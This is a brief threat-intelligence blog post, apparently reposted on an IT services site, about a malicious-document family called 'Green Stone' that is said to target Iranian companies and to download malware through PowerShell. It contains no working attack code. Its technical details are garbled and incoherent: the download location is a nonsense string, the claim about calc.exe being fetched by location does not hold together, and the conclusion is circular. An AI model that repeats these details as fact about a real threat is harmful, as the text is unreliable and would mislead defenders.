Free Phone Consultation For New Clients | CONTACT NOW

Green Stone

A few days ago, InQuest discovered a very interesting sample that was uploaded from Iran. The document is a contract for the supply of services to an energy company from southern Iran «Tavangoostar Niro va Gashtavar Jonob». The document also contains a link to this energy company. Since this family of malicious documents containing executable files was not previously known, InQuest named it the Green Stone.

InQuest also investigated the area to see if other malicious documents have been found. Analysis of these documents revealed that this type of document is currently distributed to a number of Iranian companies via email.

The Green Stone family is made up of a number of documents with malicious code embedded in them. The main function is to download and install malware on the vulnerable computer. The name “greenstone” was given because the color green is clearly visible in all elements that form the document, such as headers and footers, pictures, logos, etc.

The primary feature of this malicious family is that it downloads files from a remote server using PowerShell command line functionality without requiring user intervention.

The malware that is downloaded depends on the user’s location. If the user is located in a country where the Green Stone family of malicious documents are unknown, a Windows calculator executable (calc.exe) version 5.0 is downloaded from 12345678901234567890_example-11032014_31\downloaded\UNICORN\115238741244365920220391052710222372180656230659383785808

It is quite clear that the purpose of this malicious activity is to install any type of malware on a computer, so it can silently download and install malicious software, including many types of malware.

Source: Green Stone - AlienVault - Open Threat Exchange

Need secure managed IT services in the Greenville, SC, area?